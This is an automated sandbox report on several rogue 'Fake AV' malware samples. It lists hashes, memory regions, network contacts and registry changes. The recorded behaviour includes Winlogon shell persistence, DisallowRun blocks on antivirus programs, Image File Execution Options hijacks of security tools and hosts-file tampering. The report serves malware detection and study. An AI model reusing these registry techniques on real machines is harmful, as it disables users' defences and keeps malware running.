memory/2244-30-0x00000000002C0000-0x0000000000305000-memory.dmp

memory/1280-50-0x0000000000260000-0x00000000002F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Fake AV\tsa.crt

MD5 6e630504be525e953debd0ce831b9aa0
SHA1 edfa47b3edf98af94954b5b0850286a324608503
SHA256 2563fe2f793f119a1bae5cca6eab9d8c20409aa1f1e0db341c623e1251244ef5
SHA512 bbcf285309a4d5605e19513c77ef077a4c451cbef04e3cbdfec6d15cc157a9800a7ff6f70964b0452ddb939ff50766e887904eda06a9999fdedf5b2e8776ebd2

memory/1280-52-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/1280-53-0x0000000000400000-0x0000000000445000-memory.dmp

memory/1280-63-0x0000000000220000-0x0000000000251000-memory.dmp

memory/2580-64-0x0000000000400000-0x0000000000464000-memory.dmp

memory/2684-65-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2352-66-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-67-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2580-68-0x0000000000290000-0x00000000002F4000-memory.dmp

memory/2580-69-0x000000000029B000-0x000000000029C000-memory.dmp

memory/2352-70-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2580-71-0x0000000000400000-0x0000000000464000-memory.dmp

memory/1280-72-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/1280-73-0x0000000000380000-0x0000000000381000-memory.dmp

\Windows\SysWOW64\KBDKORC.exe

MD5 80a2bdb0db5c5fbc8695c8ded8b30c0a
SHA1 1b211211a9b02ce2986e3613ccdb56d37869abbe
SHA256 de3b58c97f73d98149c756b324f4e5a37fe2ac9beb1609e2abe1f5fef99a0ac1
SHA512 ebffc1222adc50ef3bdfd368da70ecbe4cde09a086392349e5ba4314ad5b5b99c480ca704f5d512b8fd78231503653383ff638563dd7f2302c1cf0761e973be5

C:\Users\Admin\AppData\Local\Temp\~unins2362.bat

MD5 9e0a2f5ab30517809b95a1ff1dd98c53
SHA1 5c1eefdf10e67d1e9216e2e3f5e92352d583c9ce
SHA256 97ac9fee75a1f7b63b3115e9c4fb9dda80b1caba26d2fb51325670dee261fe32
SHA512 e959cc1fd48fb1cccf135a697924c775a3812bab211fc7f9b00c5a9d617261d84c5d6f7cb548774c1e8f46811b06ca39c5603d0e10cbcb7b805f9abbe49b9b42

memory/1280-91-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/2352-92-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-93-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2716-97-0x0000000000230000-0x0000000000233000-memory.dmp

memory/2716-103-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AV2

MD5 f05db61496dfb8dc46702da9ac8818ec
SHA1 e6b0e65de5d4a5d1f125eeee32b3107efc3c9bc5
SHA256 d5ef14abeed83be252cfb6205becf53984f3683f8eabc24cbf23451efd210af2
SHA512 5357d258bef37d6f2556e91f88ea3621e120402493aa37286d194968a566eda2332a1febc6abf209a23ab5b82174020f95306cf3b70b293da989bfdeb3e0af03

memory/2716-104-0x0000000000400000-0x00000000004C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

MD5 014578edb7da99e5ba8dd84f5d26dfd5
SHA1 df56d701165a480e925a153856cbc3ab799c5a04
SHA256 4ce5e8b510895abb204f97e883d8cbaacc29ccef0844d9ae81f8666f234b0529
SHA512 bd5159af96d83fc7528956c5b1bd6f93847db18faa0680c6041f87bbebef5e3ba2de1f185d77ff28b8d7d78ec4f7bd54f48b37a16da39f43314ef022b4a36068

memory/2244-175-0x00000000002C0000-0x0000000000305000-memory.dmp

memory/2352-176-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2352-177-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-181-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-182-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2716-183-0x0000000000400000-0x00000000004C3000-memory.dmp

\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe

MD5 ba45f719f6a86cde676a9ffc7461b6b8
SHA1 b72e9329577a7f47d6d95eb6efdf694ebbb39824
SHA256 e150c5221cdd7d755eb9b09bcbedeb9e993e5d39c3902ab30752187e564c55e1
SHA512 43abb3f334e813402cb68611f3f575e2822ec951aefc1a721e64f37a267e0d207599921964233abe5ce9452f05217442a85a3e030d30b5f59f3706c6b20e04ed

memory/3068-207-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/3068-222-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2352-219-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/3068-218-0x0000000000A60000-0x0000000000AA0000-memory.dmp

memory/3068-223-0x0000000000A60000-0x0000000000AA0000-memory.dmp

memory/3068-224-0x0000000000A60000-0x0000000000AA0000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:39

Platform

win10v2004-20240226-en

Max time kernel

164s

Max time network

165s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 732 set thread context of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe

Modifies registry class

Description Indicator Process Target
Key created \registry\machine\Software\Classes\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Key created \registry\machine\Software\Classes\WOW6432Node\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeDebugPrivilege N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

\??\globalroot\systemroot\system32\usеrinit.exe

/install

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2972,i,4036376905309803364,5412922217215781933,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.107.42.16:443 tcp

Files

memory/732-1-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/732-2-0x00000000006A0000-0x00000000008A0000-memory.dmp

\??\globalroot\systemroot\system32\usеrinit.exe

MD5 4acd14244d2cd76d06939163127cfb10
SHA1 75f3e3c764f7d20c9950f5410f753f3210bcc2e7
SHA256 29b5b65a1cdf119ac7c6c9df76c6843b25a81bd00aa5a5e995ec675e34bf1acb
SHA512 001504da15c1825102479ba379b0be7ec15e779626d450d9d763552d7e1ac71f5bb86110f9361363bd401aabc53cdfd2d554480aec8bef85ed8c7b03cebf4031

memory/732-10-0x0000000000400000-0x00000000004C4400-memory.dmp

\systemroot\system32\mseeeeee.dll

MD5 8736c2a37ff0adf6f03d94bb34d1f784
SHA1 e4867b136e100c9d45f6adea593c9a636134f308
SHA256 dbe318e7c72f9558f836c920510a5245ae5af29996b62f661399ce3724458ec3
SHA512 2bbb22540e6ae0ebdd7c5303f67fb3911025a9f8f68c1c192edf5247a66bff885e292dded093d4522488b9a98f5bb00f24b00374e8eeb219184faacc95818848

Analysis: behavioral14

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:36

Platform

win10v2004-20240226-en

Max time kernel

9s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "125" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
LT 94.244.80.60:80 tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 104.208.16.89:443 tcp
US 8.8.8.8:53 udp

Files

memory/4684-0-0x0000000000400000-0x000000000057F000-memory.dmp

memory/4684-1-0x0000000002580000-0x0000000002581000-memory.dmp

memory/4684-4-0x0000000000400000-0x000000000057F000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

Signatures

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\host_new C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\generics.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msblast.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerscan.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllcache.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pfwadmin.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSSUI.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[5].exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
